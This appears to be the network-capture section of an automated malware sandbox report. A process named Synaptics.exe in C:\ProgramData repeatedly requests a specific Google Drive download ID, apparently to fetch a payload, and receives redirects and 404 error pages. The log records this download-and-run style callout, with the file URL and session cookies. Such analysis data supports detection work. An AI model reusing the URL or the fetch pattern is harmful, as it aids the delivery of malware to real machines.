                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    33192.168.2.449796142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:16 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:17 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4cPH-EFvyhaaOG3jl0QVAJ7Aq--e6zYx6DNSk_4BnFzbgH6BhgII_ExjeKyJjFUGlc
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--3PEMSapH6wrPvKcz47n3g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:17 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:17 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 54 47 7a 30 35 69 34 55 30 4e 53 69 6e 4d 72 33 4e 37 6e 48 4c 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="TGz05i4U0NSinMr3N7nHLQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:17 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    34192.168.2.449797142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:17 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:17 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC5Tyqq2iivl5ayogLnwsjEQwiETwMCPrg0tfvhIPEHjcp24apnx8POGc7JaejbW7lkBeSN3jcY
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:17 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-4pfC2-T8JB2ftMNmFRl1Fw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:17 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                                                    2024-12-30 03:59:17 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 66 51 46 34 6c 74 75 43 6d 36 61 44 79 6b 32 44 68 55 30 6f 47 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="fQF4ltuCm6aDyk2DhU0oGQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                                                    2024-12-30 03:59:17 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    35192.168.2.449799142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:17 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    36192.168.2.449798142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:17 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    37192.168.2.449800142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:17 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    38192.168.2.449804142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:18 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:18 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wrWyBb_GT-MhI35ObxB9HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    39192.168.2.449803142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:18 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:19 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:18 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YWOE5GUpgncxSDPWY-vvtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    40192.168.2.449812142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:19 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hNHLgJAu0xhbkczyxUdQoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    41192.168.2.449814142.250.181.2384435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:19 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:20 UTC1314INHTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Idlaiwqe0jG9Pw82rqae2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                    42192.168.2.449811142.250.186.1294435780C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                    2024-12-30 03:59:19 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:20 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC57ASmcY3_x-w6N-6mQTarcIk-hNhj1KDdX-rorBkXaY7PKaOjjoR_QqUX3fcUjHu8p
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0JCCXqvhC6uJApwpKunyPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
